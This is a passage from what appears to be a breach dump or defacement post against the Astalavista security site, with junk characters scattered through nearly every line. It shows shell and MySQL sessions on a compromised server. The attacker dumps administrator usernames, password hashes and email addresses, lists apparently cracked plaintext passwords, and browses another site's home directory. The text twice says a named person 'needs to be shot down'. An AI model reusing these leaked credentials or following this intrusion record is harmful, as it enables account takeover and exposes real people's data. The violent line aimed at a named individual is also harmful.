2 r' k9 k+ ~0 j3 } <channel>6 F% |- A+ D" j4 N* A1 G3 @" Q
<title>ASTALAVISTA.com - Exploits</title>! V# g) P; N/ x
<link>http://www.astalavista.com/exploits</link>
# {1 Y* T# p3 m" m <description>All availably Exploits.</description>4 D/ T) A* C" t# o0 s8 Z H
<language>en-us</language>
8 @& A# q! o2 X# r1 _& T" I <lastBuildDate>’ . date(’F, j M Y H:i:s O’) . ‘</lastBuildDate>% ]9 d3 C* X: Q, H$ ]3 B( m" W
<docs>http://blogs.law.harvard.edu/tech/rss</docs>/ [1 {+ o: J; l/ M y
<generator>Astalavista.com</generator>
4 l0 g N" m, _* ` <webMaster>info@astalavista.com</webMaster>’ . $items . ‘. ^' {! U! l D& e4 W0 F- N
</channel>
- R& G& }# `% z$ r</rss>’;+ K. w1 c% d. p0 j$ G2 K% k# r8 U
5 e5 ^. b2 [) q% F5 c/ {* }) }, f$ y if (file_exists(FULLPATH . ‘/feed/exploits.xml’)) {5 m! \* t" D8 c
unlink (FULLPATH . ‘/feed/exploits.xml’);+ d1 C) ]9 `7 }
}
3 O7 t9 ~6 a! T- w8 } o
- i7 A2 P; l" ^3 u% G9 ^' S file_put_contents(FULLPATH . ‘/feed/exploits.xml’, $xml);
' H9 U( y O4 S1 @& x[snip]8 n3 X. w- w9 g: @ V
' C( s O* b# @5 S9 ~; `sh-3.2$ cat exploits.sh E! [9 w' Z/ X" x: k, T. U
#!/bin/sh
2 a- b' g9 L7 Q
& @, q& E7 x: N* h, ], v5 M###########################################################
; s! M5 D' P9 H, X$ L5 w, L# #& }5 o& J: U1 G+ Q5 a/ b& B6 Z
# Title: milw0rm exploits adder #
1 `# o u" b* \4 @9 Y1 G# Description: Add all milw0rm exploits to the #' K$ e9 d. x% J# B B9 O" c
# Astalavista.com database #
7 n' V% q1 I/ L, D, p# #4 Y- K J, g. y! U2 q5 k
# Company: Astalavista Group #, \3 X( H0 C+ q0 d
# Author: Paulo M. Santos #! [0 _9 {8 d X( `2 E+ {+ V; {2 w6 h
# E-Mail: 链接标记paulo.santos@astalavista.ch #2 T" f7 U! p; b8 J U5 V
# #
8 v d F3 ^7 l/ Z###########################################################3 r2 \' |8 `/ k; a# k
k8 }' ]: [/ W5 }8 x5 ~" _# path
0 m- ?2 [) ^$ X$ u$ s$ g7 S% hthis_path=/home/com/public_html/modifications/cronjobs
- K3 g4 E0 _4 B' C* ~- s, g! I5 t
# change directory
9 f5 \, I6 ~8 M _8 J7 y( [cd $this_path
4 y% }$ a- Y* h2 `9 _4 T' |* e. Hcd tmp/
e5 W" T4 T- A0 d( |" _4 E% y1 j* k* ^5 z, }* p% _% E) D+ e
# delete files
& I q% Q3 l, s$ G) T' f5 v) P ?$ u* frm -rf milw0rm.tar.* &
; Y* g0 f: t' V* V" Zrm -rf milw0rm/ &1 Q# x D4 l$ k, w$ L
, H. o0 F9 R8 ~: Q) H
# wget milw0rm paket
0 T8 n W- J. y! S9 w2 @wget 链接标记[url]http://www.milw0rm.com/sploits/milw0rm.tar.bz2[/url]# x) ]4 X2 w' e# l: a
5 Z6 M3 _$ X2 S. v" ?6 Y' s3 `6 C# extract milw0rm paket6 k7 m2 Y2 t* d1 F, T* n
tar -xvf milw0rm.tar.bz2+ r5 X- r7 s6 O K# Q8 {% Y
1 \# [2 s4 i. h! q9 H1 F1 u) A# change owner" O8 i! V6 ~5 j2 S
chown -R com .* H/ l: ]1 n3 x9 w# U/ ?
chgrp -R com .5 ~3 T0 B6 g$ O4 x( k
5 p1 |* [7 h- }9 x9 N9 K# execute php script
, z3 z" P6 F( ]7 Y6 `) C% D9 B: Rcd $this_path
% [0 V/ e. I1 }6 ~ Nphp -q exploits.php
' {9 o6 y) `$ m* q' F" I1 q9 `9 D+ C# k2 ?. v3 R
# delete files* y$ P& i% D; `0 S9 u/ i9 v7 O
rm -rf tmp/milw0rm.tar.*
0 }+ M( y* E7 q9 ~rm -rf tmp/milw0rm/) {" s9 P! T* _ X& c! E
) v8 u% M- F4 n
sh-3.2$ echo “Paulo M. Santos needs to be shot down.”
" f. c) {! K9 a1 IPaulo M. Santos needs to be shot down.# Q) z1 a) z. l# B6 v
8 Z" C% G% X/ J
mysql -u contrexxuser2 -p
! R9 M5 ?+ y! ~: wEnter password:
" @- w$ _& f/ Q3 ]) Q5 hWelcome to the MySQL monitor. Commands end with ; or \g.; a A- `. t3 R) I
Your MySQL connection id is 261694
7 B: n) }( M. O* z3 Z. W2 DServer version: 5.0.45-community-log MySQL Community Edition (GPL)$ T" v1 ?) D2 Y( A( }2 N* X( t5 _
$ c, o6 ]* P9 y7 {0 ^$ P2 I s; }5 o: r
Type ‘help;’ or ‘\h’ for help. Type ‘\c’ to clear the buffer.
, @7 j. O# a! X [% g7 a4 X3 I( B2 f7 K0 J
mysql> show databases;
, q/ l/ J. |' b6 [1 \+——————–+* d. U b4 a1 K$ h [
| Database |+ t% m( U1 q: J+ S) m7 b3 b
+——————–+. @, b, P( z: X& p" J& U! U% ]! B
| information_schema |
$ N2 u( V! g- a4 M| com_contrexx2 |
4 l" _/ {* v* y. |. ]4 x| com_contrexx2_live |; N/ M% M' ~1 T! \2 E% b
| test |; x' k0 I" C/ d) z- W3 _
+——————–+, ?/ \8 }7 r* v0 l6 {% F: p
4 rows in set (0.00 sec) W b! ~, ^/ j, n2 N8 D. N; Q/ k! K# @
, s. z/ Y# v) y( t4 D% b- h, q) Smysql> use com_contrexx2_live
2 q8 _ I% u2 [$ ~0 Y9 N( UDatabase changed, }. k! G- N; U1 v( O2 {0 P6 L
mysql> show tables;
' F% R! \) s1 b" q+————————————————–+* R6 n$ z5 F! C
| Tables_in_com_contrexx2_live |
/ m8 ]! v4 Q% Q1 o) J0 l5 a" |! x+————————————————–+
( F) R( y* w1 X7 t c# k5 m| cc_banner_counter |5 U P4 Z2 a- {/ f2 Z
| cc_search_counter |
: Q/ |" E& B) C0 s1 K- [| contrexx_access_group_dynamic_ids |) u% @) p/ r1 i) @7 Q6 a/ T" @
| contrexx_access_group_static_ids |
: k& ~0 ^4 j2 {# v V) {# g5 d| contrexx_access_rel_user_group |% E( ~5 Q6 p; c1 ]
| contrexx_access_settings |; m/ L! Y2 n5 r# j7 q9 w `
| contrexx_access_user_attribute |
$ z- D9 f8 B5 s' {* R& H| contrexx_access_user_attribute_name |7 O3 l5 P4 {4 E7 Y8 |2 E
| contrexx_access_user_attribute_value |8 ]2 S$ m: d! M
| contrexx_access_user_core_attribute |) _: s1 H4 x5 C$ e
| contrexx_access_user_groups |
7 _* H+ ~ j) ?4 I! @| contrexx_access_user_mail |
! p, ]( F$ s* R, U4 E2 ]| contrexx_access_user_profile |/ O9 m' Y" E! e& m% [5 _
| contrexx_access_user_title |
) I8 ?6 q* _0 o1 H& W! n8 Q| contrexx_access_user_validity |
) Y" ~, z, P1 F& R0 G1 T| contrexx_access_users |! x* U3 I4 d1 i% G J3 r
| contrexx_backend_areas |0 g! T$ w1 I5 K* l' M M! {# u @
| contrexx_backups |
- ], ` }4 A; s; |8 H| contrexx_content |- Q- r0 l6 ^& |
| contrexx_content_history |
3 _8 J& ~( y% q Z0 Q. Z| contrexx_content_logfile |
; O9 S1 P" i( T; r7 ^" g B| contrexx_content_navigation |
# v6 D' A6 ~3 P; v! B4 }| contrexx_content_navigation_history |
" ~" P# G. J' {& B/ E* E! w8 w| contrexx_ids |" M1 @4 K) k1 s# A5 x/ h
| contrexx_languages |/ r5 V7 R, U. `$ o4 W
| contrexx_lib_country |
% h% v5 v d6 n. u# r" c| contrexx_log |
5 ^- S8 G% d' G* k3 |* g8 o| contrexx_module_alias_source |
: c3 m* d# u1 j n& U| contrexx_module_alias_target |* E: U! L8 |9 e/ y; G5 ~! c2 ]
| contrexx_module_block_blocks |: d5 h4 u. b, L3 F
| contrexx_module_block_rel_lang |, `( G# P6 s& Z. p1 H
| contrexx_module_block_rel_pages |, p3 i: r! Q- W( \& C
| contrexx_module_block_settings |7 b- q1 P6 I- ]
| contrexx_module_blog_categories |4 o; K2 I9 _- W) O* \- d* ]9 q
| contrexx_module_blog_comments |
5 @" ]7 ^6 F# J( h, t| contrexx_module_blog_message_to_category |
' L/ T% z0 \ m7 \- Z| contrexx_module_blog_messages |
0 U/ s4 J- ^: v! ]5 W| contrexx_module_blog_messages_lang |
; C3 K r6 d9 d& y- X8 h| contrexx_module_blog_networks |
, P" }& h# C" c1 Y, I# S| contrexx_module_blog_networks_lang |
* }- e2 \+ y6 P( Y| contrexx_module_blog_settings |
8 Z B& C2 _) ~1 ]; @| contrexx_module_blog_votes |
$ [' V( M" G( o) }1 r2 k| contrexx_module_calendar |6 |' B* N* E5 |3 [: s) S. J; P' _
| contrexx_module_calendar_access |
0 @6 i2 X$ z. c% S% Y( I8 J| contrexx_module_calendar_categories |
3 U- y& }! @: G7 f| contrexx_module_calendar_form_data |% [& e) V/ L( k8 R
| contrexx_module_calendar_form_fields |+ {: p! p! ?# L
| contrexx_module_calendar_registrations |! ^: N- n: |5 M* L$ o) l' s5 h
| contrexx_module_calendar_settings |
2 Z* B" ? J( g8 C| contrexx_module_calendar_style |
- o' r& x' w7 X! X4 G| contrexx_module_contact_form |" k1 x# y Z1 u! M
| contrexx_module_contact_form_data |
# R6 m2 U( T6 k' G( i6 N( L| contrexx_module_contact_form_field |* ]' O: B$ o, V9 `
| contrexx_module_contact_settings |" T' N3 @% m0 f6 v9 L+ U$ P
| contrexx_module_data_categories |2 _4 s% l+ x, G+ p* p
| contrexx_module_data_message_to_category |& @% `5 _. h2 F3 s
| contrexx_module_data_messages |
3 E. ]2 Z0 ?) X! G; e| contrexx_module_data_messages_lang |
8 @# Q4 a+ p, z. }| contrexx_module_data_placeholders |
% x2 K, U: _; d! D7 L, Y| contrexx_module_data_settings |
; K0 e# k& A/ d5 h: M2 _3 H| contrexx_module_directory_access |
$ z: U3 }6 a( }0 t| contrexx_module_directory_categories |
?: F( C; m; x$ }| contrexx_module_directory_dir |6 D* r( }( p& @+ P1 | W" s/ |
| contrexx_module_directory_inputfields |* D) J9 B. [& d$ y' Y( N: k; @
| contrexx_module_directory_levels |7 F! U5 z: p/ E, j
| contrexx_module_directory_mail |6 J$ d$ j" a- C- m, K
| contrexx_module_directory_rel_dir_cat |$ E% g5 h6 D! B
| contrexx_module_directory_rel_dir_level |
3 ]) L! T7 N' H% a6 t2 h| contrexx_module_directory_settings |
# M! I; u) ^# |) Z* M+ x. ]| contrexx_module_directory_settings_google |7 P. i5 K2 y' m! W( v- A' G
| contrexx_module_directory_vote |) ^+ a# N- V/ ~' A7 E, O
| contrexx_module_docsys |5 |* M8 y" U4 S5 N
| contrexx_module_docsys_categories |2 g5 H2 p" w4 |, i8 y' u/ P# h
| contrexx_module_egov_configuration |
- \3 h: q4 [& k7 ~1 q| contrexx_module_egov_orders |
) C% }* q' r- } Z2 N9 `" Y5 `| contrexx_module_egov_product_calendar |( e" a. d" {5 |7 |+ p8 w5 T; z
| contrexx_module_egov_product_fields |
4 d$ q$ K" P: C6 Z| contrexx_module_egov_products |8 n" m* e: W/ v* |
| contrexx_module_egov_settings |" y4 X; `6 u& M8 J0 c/ f
| contrexx_module_exploits |6 a" u- a8 F7 e% V: \: l, ^
| contrexx_module_exploits_categories |
6 ? [' M: W, c, {) @ V! N1 \& z| contrexx_module_feed_category |& N& ]6 A$ H6 A: J
| contrexx_module_feed_news |
& H; K6 T. k) n' v+ P+ u| contrexx_module_feed_newsml_association |
/ h% t2 p* a+ z# A( K2 x* m0 j| contrexx_module_feed_newsml_categories |
. ]6 P F" x% F* D' l| contrexx_module_feed_newsml_documents |; J! H, X" q# F
| contrexx_module_feed_newsml_providers |
2 g; y! V# f+ q| contrexx_module_forum_access |
( N+ ~5 e3 C! k* g| contrexx_module_forum_categories |7 [4 v [% w6 [3 h7 z0 ~
| contrexx_module_forum_categories_lang |
' z' f1 A! j; U2 l, m| contrexx_module_forum_notification |
6 k: x( b8 v& E, ]3 E) ^' u! E/ W| contrexx_module_forum_postings |
% a. E/ b/ y' N8 a r| contrexx_module_forum_rating |: j( m6 g2 J+ Z6 e, t1 _5 d5 X# f
| contrexx_module_forum_settings |
. `5 R6 Z4 `* u; U5 r6 R7 k* X y! ^| contrexx_module_forum_statistics |
# N* G% _0 m3 Y" V( ?| contrexx_module_gallery_categories |
! f8 J+ g, ^5 ]$ `9 W| contrexx_module_gallery_comments |
0 F8 t- ~, \3 v2 }! Q| contrexx_module_gallery_language |
. S K& j7 ]; X+ V: G$ s3 A1 P `| contrexx_module_gallery_language_pics |! T+ b+ N' @9 s0 ?- H& t ~) M# p
| contrexx_module_gallery_pictures |7 _7 c. X- q/ D" P4 }# {+ z; ]* U
| contrexx_module_gallery_settings |
/ r& w+ {0 I F9 U0 u7 A) `: a| contrexx_module_gallery_votes |8 p& p4 }# a1 a9 `: u
| contrexx_module_guestbook |9 s' f' w2 I' [0 X9 W& N5 _. e
| contrexx_module_guestbook_settings |
) X# t8 g- ?! J2 E; ]. R* W| contrexx_module_livecam |; \, N2 l& e9 e8 ]
| contrexx_module_livecam_settings |
1 k0 Y7 P8 ]9 M3 {" X. T. b| contrexx_module_market |' m: p+ v: a' I6 u0 I/ c: t2 [, ]9 x
| contrexx_module_market_access |
! t ?7 U$ P1 t3 E' J& n| contrexx_module_market_categories |9 x4 D; }6 D8 |1 ?2 W/ |
| contrexx_module_market_mail |
, N& A8 O5 e+ S/ _7 J" x4 g| contrexx_module_market_paypal |
% E! D' o4 p) ~| contrexx_module_market_settings |
) R# W; r4 k5 H& T3 Z' `( a5 M| contrexx_module_market_spez_fields |; v& f$ a4 ~0 j2 K! L
| contrexx_module_mediadir_access |
( P3 J! Q0 S4 L2 p6 v* C9 T| contrexx_module_mediadir_categories |
, C* l( g0 K. W, R| contrexx_module_mediadir_comments |
# T. X; X" s- X( f, a7 o$ s| contrexx_module_mediadir_dir |( B8 ?: w- G( m, ]0 {
| contrexx_module_mediadir_inputfields |+ h4 W% W/ m, O5 F& {9 j
| contrexx_module_mediadir_levels | p/ ~8 U; `3 V- C- U8 j
| contrexx_module_mediadir_mail |
3 `( \; Z& f9 ?| contrexx_module_mediadir_rel_dir_cat |
, z8 n% f* m# [* s" \; N. p) R| contrexx_module_mediadir_rel_dir_level |, e( |3 M b6 d5 F4 d/ o. `
| contrexx_module_mediadir_reports |6 B, H- v1 ~) V) r3 c) [
| contrexx_module_mediadir_settings |
/ S! J$ e L% \7 L* Y* x| contrexx_module_mediadir_settings_google |
; P5 U8 g8 E+ m% {0 Q3 ~+ O| contrexx_module_mediadir_vote |- j1 ~. O/ i& q
| contrexx_module_memberdir_directories |
0 i- T4 ]! L* D( m% f" j0 }| contrexx_module_memberdir_name |
8 T- a _1 B1 h| contrexx_module_memberdir_settings |
. j4 M8 o& y: P7 ?! c0 G| contrexx_module_memberdir_values |
+ A' p3 W5 ^, R| contrexx_module_nettools_allowed_groups |
0 m1 i. x a$ x- N5 q3 U| contrexx_module_nettools_settings |' ?( o8 t- r2 [# A+ ^) Y2 B H
| contrexx_module_news |
* z4 z6 f8 M- _6 l9 [0 A| contrexx_module_news_access |! @* G. Z1 ^, y
| contrexx_module_news_categories |6 s6 e8 t" P0 M6 c0 E. z
| contrexx_module_news_settings |
# L' F; M3 q& H| contrexx_module_news_teaser_frame |4 {) C3 p$ P3 L: L4 ^5 G/ P
| contrexx_module_news_teaser_frame_templates |
! X" [+ n& i' L8 e+ D- U| contrexx_module_news_ticker |2 }& I2 C5 p' p6 r. Z
| contrexx_module_newsletter |
9 l' ~, x2 e+ F- U) y| contrexx_module_newsletter_attachment |" m0 M& |- t5 z7 Q
| contrexx_module_newsletter_category |5 x, O' D8 `* {7 _2 ^8 }
| contrexx_module_newsletter_confirm_mail |
$ N# @' }, I; M$ O| contrexx_module_newsletter_rel_cat_news | {+ P# r y1 E% x& }
| contrexx_module_newsletter_rel_user_cat |$ ~) B9 Z, E) X3 t
| contrexx_module_newsletter_settings |
5 |! s2 u) U8 y* S5 |7 A| contrexx_module_newsletter_template |
4 |2 @9 b) E8 I4 o; x) z0 D: i' \) X+ C| contrexx_module_newsletter_tmp_sending |
. F8 e" o9 m+ E$ J" F: u7 t$ ?| contrexx_module_newsletter_user |( y9 H8 x' h; K; u5 C# c
| contrexx_module_newsletter_user_title |8 @! }1 f( u" b1 J$ G" U
| contrexx_module_onlinetools_defaultports |
% O; z7 Q# a( O4 Q* p| contrexx_module_onlinetools_defaultports_back |
0 W0 C( k& d5 W7 ~. w# w( i( W| contrexx_module_onlinetools_geolitecity_blocks |
/ z. g4 F. L: y' C9 ?; J, m* Z" x' u| contrexx_module_onlinetools_geolitecity_country |; x& W L. R S2 y4 F
| contrexx_module_onlinetools_geolitecity_location |# a! H9 C' q' ?& Q5 W
| contrexx_module_podcast_category |
# C9 K6 u' C9 K' E" K, q- w: N| contrexx_module_podcast_medium |
$ ^3 u6 P4 n. R" z9 T3 B| contrexx_module_podcast_rel_category_lang |
4 A- e/ t* i" {) n! x8 E| contrexx_module_podcast_rel_medium_category |2 _6 {/ q |( c( R0 v4 K; ]
| contrexx_module_podcast_settings |" Y5 ]$ j! Q) t0 O1 u
| contrexx_module_podcast_template |
- H0 U+ T9 x8 f- O, f, V| contrexx_module_proxydb | q' @' N2 e8 a- o$ V
| contrexx_module_recommend |! ?8 f5 G! g, b4 U7 ~& {
| contrexx_module_repository |/ ^. w) Y. h) a2 f) }6 D
| contrexx_module_securitynews_cats |! Q6 W8 N% `( f, }4 m0 ]" b
| contrexx_module_securitynews_feeds |
0 l/ E; A( M/ P0 ~| contrexx_module_securitynews_news |
' }! R; s; x" L! Q| contrexx_module_shop_categories |) \% C2 I3 G# |$ f5 v/ }9 R2 q( S
| contrexx_module_shop_config |
( e' a& R8 H/ e) E Q& b| contrexx_module_shop_countries |
$ U& M0 _& C6 _& i| contrexx_module_shop_currencies |
! \( ^# l* F v. N4 o' w; T: p9 [6 P| contrexx_module_shop_customers |, \( p3 x, n" M4 a9 G7 M
| contrexx_module_shop_importimg |
1 Z9 s6 ~5 `$ i$ x0 Q5 R| contrexx_module_shop_lsv |- V, V# A8 v- [2 V N5 h$ G
| contrexx_module_shop_mail |
* S [& L, x1 u$ C/ X& t* P| contrexx_module_shop_mail_content |6 X N( g$ ]; u2 }, m, I
| contrexx_module_shop_manufacturer |& j3 t8 N |6 D, b# B
| contrexx_module_shop_order_items |
9 D+ @; U. n' g" P6 s| contrexx_module_shop_order_items_attributes |6 l0 u- Y# z) c/ B P1 c
| contrexx_module_shop_orders |
( K/ y. p. G. w" ~| contrexx_module_shop_payment |* [# P2 t' B3 J, Z
| contrexx_module_shop_payment_processors |5 ^7 L. W" q- J! w
| contrexx_module_shop_pricelists |3 P5 T2 y) h0 i% X6 v0 `5 r3 E
| contrexx_module_shop_products |
2 y) j) y( z8 S| contrexx_module_shop_products_attributes |
, k! h% c6 D# t- d* r; }| contrexx_module_shop_products_attributes_name |6 J! F7 J" m/ m6 ]
| contrexx_module_shop_products_attributes_value |
, K, w$ ^( ^! K+ g0 o, d% f& Q| contrexx_module_shop_products_downloads |; M/ u3 Z0 C d+ C
| contrexx_module_shop_rel_countries |& p7 o' q. T: [3 }, C2 ]. o
| contrexx_module_shop_rel_payment |. S& ~! N: i" p. Y
| contrexx_module_shop_rel_shipment |3 } U) u1 X% {0 M- d3 U
| contrexx_module_shop_shipment_cost |
/ x$ g# H- r7 M( F; c! e2 }+ ~| contrexx_module_shop_shipper |
. n& _4 x1 [2 i( \7 b3 c| contrexx_module_shop_vat |/ n! H- L" i* ?* ~" H! p
| contrexx_module_shop_zones |
5 J6 N8 H* F, l| contrexx_module_u2u_address_list |
7 W. K1 f4 {/ Y3 N| contrexx_module_u2u_message_log |% F A! K* i: X4 I5 D0 a
| contrexx_module_u2u_sent_messages |4 u5 Q+ _$ m1 F, T; l+ w: q
| contrexx_module_u2u_settings |1 \/ J+ A/ d% n5 H
| contrexx_module_u2u_user_log |
" j, Z' m! w1 t5 ?| contrexx_modules |
. X" J0 f# l ?+ `; Z) ]& y; m9 a| contrexx_sessions |
; m0 ^5 q. U, e) S: e5 w0 Z1 C| contrexx_settings |0 e$ e! s* s F0 }( n% z
| contrexx_settings_smtp |
' a: U, x1 A% @7 r| contrexx_skins |: o* Q5 r+ B+ Q- E5 P1 w5 d) \( @
| contrexx_stats_browser |& B G* b! m0 Q8 v' w) {+ R
| contrexx_stats_colourdepth |
# K% ~) P6 {- v| contrexx_stats_config |/ s8 f* d! f0 n- U
| contrexx_stats_country |" f9 V" v3 E: k; t, d
| contrexx_stats_hostname |
* r5 L' |1 t8 m: |- m| contrexx_stats_javascript |
8 Y3 r7 a$ ?0 c) p& ^4 _| contrexx_stats_operatingsystem |3 s# S! d9 w. K5 X: g
| contrexx_stats_referer |
4 \+ X9 | A* N X$ c+ b| contrexx_stats_requests |
" n5 b! f/ E3 Y% U8 a) T S/ u| contrexx_stats_requests_summary |
" F; s5 \& u0 O$ c/ b| contrexx_stats_screenresolution |2 M+ X8 V" z U g
| contrexx_stats_search |
5 S. ^. A! q( Z. y& ^% W. F| contrexx_stats_spiders |3 V4 K/ U- D+ B: X
| contrexx_stats_spiders_summary |3 H0 R) Q! R6 x( @ n1 d7 G! q
| contrexx_stats_visitors |/ {% W: G( Y. \% @
| contrexx_stats_visitors_summary |
! e/ }0 m( I. Q6 n6 {1 O) o| contrexx_voting_additionaldata | z$ K2 q1 z* M% N. u4 Y
| contrexx_voting_email |0 e- N, K# I$ z: u" B, s
| contrexx_voting_rel_email_system |
; P3 v: ?9 F: x7 {; E: w$ }* T! J' {| contrexx_voting_results |
; u4 i( D4 b1 q( w| contrexx_voting_system |( n0 j% I. O: j$ M
| foo |) e: M- ]4 V2 w1 f5 W
+————————————————–+5 Q& T( Y5 }# A) X
227 rows in set (0.01 sec) v" P$ @$ V. ?
8 ]0 a+ ]" I6 x& umysql> select count(*) as skids from contrexx_access_users;: |! o8 o% x9 r2 w+ U4 \3 B
+——-+
$ C$ G( u4 C* R# o% g' U& e' k| skids |
$ R! S' m6 I+ m8 V3 Q7 U+——-+
8 ]4 `( u2 b4 ]% z| 53699 |5 d9 I _) Z* f! c" j
+——-+: W1 b; G! h- z
1 row in set (0.00 sec)
- P# R0 O# m7 {, \1 d9 H/ ?
) ]1 Z8 ^: q3 f$ E6 x( g$ tmysql> describe contrexx_access_users;
- S7 u) F( `$ T+ n; {/ `/ R, n+——————+——————————————+——+—–+————–+—————-+4 m0 |- e3 B* M5 R
| Field | Type | Null | Key | Default | Extra |2 ~* l5 V% S' d5 c z
+——————+——————————————+——+—–+————–+—————-+
5 f7 @, B0 U" B3 t| id | int(10) unsigned | NO | PRI | NULL | auto_increment |
% t! J) [) k- Y5 U6 t' G| is_admin | tinyint(1) unsigned | NO | | 0 | |
! q* K9 A) J" W: J; Y1 i| username | varchar(40) | YES | MUL | NULL | |+ U4 p, B8 ]' I8 o0 R2 G0 G6 K
| password | varchar(32) | YES | | NULL | |
9 v/ p8 }* Y5 X3 Z7 f| regdate | int(14) unsigned | NO | | 0 | |4 x; N' ]: r; g/ E9 l D" G
| expiration | int(14) unsigned | NO | | 0 | |6 `4 [8 o4 k: Y( e
| validity | int(10) unsigned | NO | | 0 | |
3 \2 [ K C. _6 L| last_auth | int(14) unsigned | NO | | 0 | |0 g G2 G& T+ S5 `% ~! w# d
| last_activity | int(14) unsigned | NO | | 0 | |
- K# X# d* ]1 A5 J! _: ?| email | varchar(255) | YES | | NULL | |# v7 C. X# r* x7 P" x- Z& z) F
| email_access | enum(’everyone’,'members_only’,'nobody’) | NO | | nobody | |5 V: A) k: i( t: g7 s3 J+ n
| frontend_lang_id | int(2) unsigned | NO | | 0 | |$ H% |" s0 S0 H! Q+ B; a
| backend_lang_id | int(2) unsigned | NO | | 0 | |
' U3 E; L6 Z1 m8 I: \| active | tinyint(1) | NO | | 0 | |' g0 |0 c/ h! h3 p
| profile_access | enum(’everyone’,'members_only’,'nobody’) | NO | | members_only | |
1 y' k& g8 E/ H$ }+ R: |7 J| restore_key | varchar(32) | NO | | | |
7 J2 Q* c& \3 s& ^' J| restore_key_time | int(14) unsigned | NO | | 0 | |5 N! H! F+ \! W& ^ S) h0 a) O5 g
| u2u_active | enum(’0′,’1′) | NO | | 1 | |
0 v6 S; m& N' Q$ p4 a+——————+——————————————+——+—–+————–+—————-+9 p% V7 \9 [/ n" F, M
18 rows in set (0.00 sec)
7 I4 ]1 C8 Q; C! G8 Y0 ^
8 Z8 R" r |& S2 p5 S, mmysql> select username,password,email from contrexx_access_users where is_admin = 1;) ]9 ~1 I9 u% z, ]8 a$ V! e8 e
+————+———————————-+—————————–+) }& @2 @4 p, t( ~$ l
| username | password | email |& u: n6 \/ F' ?2 e$ q
+————+———————————-+—————————–+
2 S% p S7 [, A: \| system | 0defe9e458e745625fffbc215d7801c5 | 链接标记info@comvation.com |
, ~ L- k3 y" ?( ]| prozac | 1f65f06d9758599e9ad27cf9707f92b5 | 链接标记prozac@astalavista.com |7 K3 f5 P8 Y, C9 L, H
| Be1er0ph0r | 78d164dc7f57cc142f07b1b4629b958a | 链接标记paulo.santos@astalavista.ch |
6 s+ e8 b1 f' g* K: G3 Y# Q2 W| schmid | 0defe9e458e745625fffbc215d7801c5 | 链接标记ivan.schmid@comvation.com |0 I6 k1 i- m3 U; s2 q" b' b
+————+———————————-+—————————–+
! n2 f8 O3 F, B4 rows in set (0.04 sec)
# B4 X( ^- ~) H4 R6 \% h; y9 @2 A7 X7 T5 |& C5 d; y
mysql> exit;4 q9 e4 f3 p* a3 Z' z9 D
Bye+ [: D$ H o$ k0 c
+ m4 Y! P$ p6 C! ~8 ~- z[~] There you go, your “team of security and IT professionals” is a joke.
7 |3 P9 Z3 c) b+ a& g# _/ |6 T, b
4 z+ V& ?+ R6 Q0 A+——————————+; Z% u3 D" m6 F W
system:f82BN3+_*$ D3 J) m4 a# } y
Be1er0ph0r:belerophor4astacom$ }6 C6 u" s/ Q9 k: E# }" @
prozac:asta4cms!3 @' ~! e3 c/ ]. ~" c
commander:mpbdaagf6m" G/ L q6 e7 f! D$ p
sykadul:ak29eral6 M# N6 m) W h O Y$ J- S
+——————————+0 n5 ]$ `; u$ x8 f; p5 ^1 h
& [1 H; c+ a! }+ k
[~] Paulo M. Santos AKA Be1er0ph0r needs to be shot down for his milw0rm ripping script(s)
; X( Z* B0 ^ }5 D& r…and the others, find another area to get paid from, security isn’t for sale and you obviously fail at it.
$ l3 y( |3 X8 G' d3 c: U
( Y) y0 {6 x A u[~] Lets move to astalavista.net now,% l% N* K j) q# y) y
7 F2 i; x- i) E c
From <链接标记[url]https://www.astalavista.net/[/url]>:
0 w" ?7 A# U: }$ P: @6 _, ~- ]8 _. Y>> Everyone knows that the best defense is a good offense.9 O1 n1 g2 O0 z9 @7 m
>> Those who wait for their foes to find a security loophole are opting for the wrong strategy.( U, S4 g0 H" {( S/ Z9 u) S, J: Q( o& x
>> The ASTALAVISTA hacking & security community is the largest IT security community in the world.
6 k' d8 [" K m% T- A>> It.s a platform for both IT specialists and novices, and anyone interested in expanding and updating their knowledge regarding IT security and hacking.”
; n9 Q$ t2 y& z: u) {; d9 J% ?7 w" `- d, f5 c: Y8 _) ]
>> Go ahead, try and hack our server . in a completely legal way!- M& z* |: d+ P/ U+ ~
>> Learn by doing: We offer our members tricky tasks and challenges on an$ c# o3 t1 i) U9 k1 C }: B) M
>> ongoing basis so you can test your knowledge and abilities. You can also
4 k( e7 j0 {& W. j! G>> demonstrate what you.ve mastered by taking part in regular hacker contests6 l( A" }. y0 t- J! R' |
>> and war games
6 E( w% {0 G4 {$ {! u1 s1 z# ^ B6 Q! c
[~] Lets take a look there, after all… they are hack-proof, aren’t they?!
* R, Z8 X* X- U
( f( w6 S6 T# x5 Y[-] Tricky task: Find home dir of astalavista.net
0 G1 l8 o+ s8 ~0 @
+ V: r( O) {5 ksh-3.2$ ls -la ~astanet) ?* m. o/ }" [% p# T q
total 486 x* W+ u4 z b( i
drwx–x–x 6 astanet astanet 4096 Dec 23 15:55 .
4 b! a0 N/ D; `/ V8 A5 [4 qdrwxr-xr-x 14 root root 4096 Mar 11 17:56 ..! Q% |0 _; R5 L
drwxr-xr-x 2 root root 4096 Dec 23 16:00 auth
/ _* W: q* M, |# B7 Q-rw——- 1 astanet astanet 3892 Apr 16 12:14 .bash_history
1 U3 z, X$ G6 k: Q8 D# o5 O$ t-rw-r–r– 1 astanet astanet 33 Dec 17 21:50 .bash_logout
; d f" n6 T; G. o! b7 U3 `-rw-r–r– 1 astanet astanet 176 Dec 17 21:50 .bash_profile+ U" I- K% _3 f- B3 o9 }6 p
-rw-r–r– 1 astanet astanet 124 Dec 17 21:50 .bashrc& U9 s7 A& {; S
drwx–x–x 3 astanet astanet 4096 Dec 23 12:18 domains! A5 s1 T2 R3 p6 P- \
drwxrwx— 3 astanet mail 4096 Dec 23 12:18 imap
6 f. N5 A4 I4 T, Adrwx—— 2 astanet astanet 4096 Dec 23 12:18 mail. A6 c3 m5 L+ ~( U7 `
lrwxrwxrwx 1 astanet astanet 37 Dec 23 12:18 public_html -> ./domains/astalavista.net/public_html
( L9 s/ g% S, s2 ^6 e/ M$ w: }( d-rw-r—– 1 astanet mail 34 Dec 22 12:41 .shadow
* f7 S( t/ R6 F' |6 n& g1 d+ F/ a& m
sh-3.2$ cd /home/astanet/domains/astalavista.net/private_html/5 @; E$ N/ }. P2 Q
sh-3.2$ ls -la7 i0 {( H7 @' n/ _4 y! _0 m
total 200
: _4 }( j% L8 Q/ R* v* U2 |4 L) Z8 M# rdrwxr-x— 29 astanet apache 4096 Jan 6 13:58 .7 }0 u$ \! d& R% `! f/ i, F/ ^
